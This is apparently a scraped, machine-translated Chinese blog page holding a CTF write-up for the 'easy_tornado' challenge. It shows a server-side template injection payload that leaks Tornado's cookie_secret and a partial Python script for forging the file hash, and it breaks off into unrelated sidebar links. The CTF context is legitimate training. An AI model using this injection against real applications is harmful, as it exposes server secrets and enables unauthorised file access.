当前位置:网站首页>Vulnerability recurrence easy_ tornado
Vulnerability recurrence easy_ tornado
2022-07-07 08:10:00 【_ s1mple】
[ Environmental Science ]
windows
[ Tools ]
Firefox
[ step ]
tornado yes python One of them web Application framework .
Got the title and found three documents :
flag.txt
/flag.txt
flag in /fllllllllllllagFind out flag stay /fllllllllllllag In the document ;
welcome.txt
/welcome.txt
renderrender yes python A rendering function in , Render variables into the template , That is, different pages can be formed by passing different parameters .
hints.txt
/hints.txt
md5(cookie_secret+md5(filename))filehash=md5(cookie_secret+md5(filename)) Now? filename=/fllllllllllllag, Just need to know cookie_secret Can access flag.
After the test, I found another one error Interface , The format is /error?msg=Error, It is suspected that there is a server-side template injection attack (SSTI)
Try /error?msg={ {datetime}} stay Tornado In the front-end page template ,datetime It's pointing python in datetime This module ,Tornado Some object aliases are provided to quickly access objects , You can refer to Tornado Official documents
Find... By looking up the documentation cookie_secret stay Application object settings Properties of the , Also found that self.application.settings There's an alias
RequestHandler.settings
An alias for self.application.settings.handler To handle the current page RequestHandler object , RequestHandler.settings Point to self.application.settings, therefore handler.settings Point to RequestHandler.application.settings.
structure payload obtain cookie_secret
/error?msg={
{handler.settings}}
'cookie_secret': 'M)Z.>}{O]lYIp(oW7$dc132uDaK<C%[email protected]![VtR#geh9UHsbnL_+mT5N~J84*r'Calculation filehash value :
import hashlib
def md5(s):
md5 = hashlib.md5()
md5.update(s)
return md5.hexdigest()
def filehash():
filename = '/fllllllllllllag'
cookie_secret = 'M)Z.>}{O]lYIp(oW7$dc132uDaK<C%[email protected]
Linux server development, MySQL transaction principle analysis
Empire CMS collection Empire template program general
Padavan manually installs PHP
追风赶月莫停留,平芜尽处是春山
Few shot Learning & meta learning: small sample learning principle and Siamese network structure (I)
船载雷达天线滑环的使用
Yugu p1020 missile interception (binary search)
Leetcode medium question my schedule I
Myabtis_Plus
Leetcode simple question: find the K beauty value of a number
随机推荐
Recursive method to verify whether a tree is a binary search tree (BST)
Introduction to basic components of wechat applet
芯片 設計資料下載
Leetcode 40: combined sum II
藏书馆App基于Rainbond实现云原生DevOps的实践
LeetCode简单题之字符串中最大的 3 位相同数字
通俗易懂单点登录SSO
青龙面板-今日头条
Myabtis_Plus
jeeSite 表单页面的Excel 导入功能
OpenJudge NOI 2.1 1752:鸡兔同笼
电池、电机技术受到很大关注,反而电控技术却很少被提及?
[VHDL parallel statement execution]
Topic not received? Try this
【踩坑系列】uniapp之h5 跨域的问题
Call pytorch API to complete linear regression
The zblog plug-in supports the plug-in pushed by Baidu Sogou 360
Content of string
WARNING: Retrying (Retry(total=4, connect=None, read=None, redirect=None, status=None)) after conne
Qinglong panel -- finishing usable scripts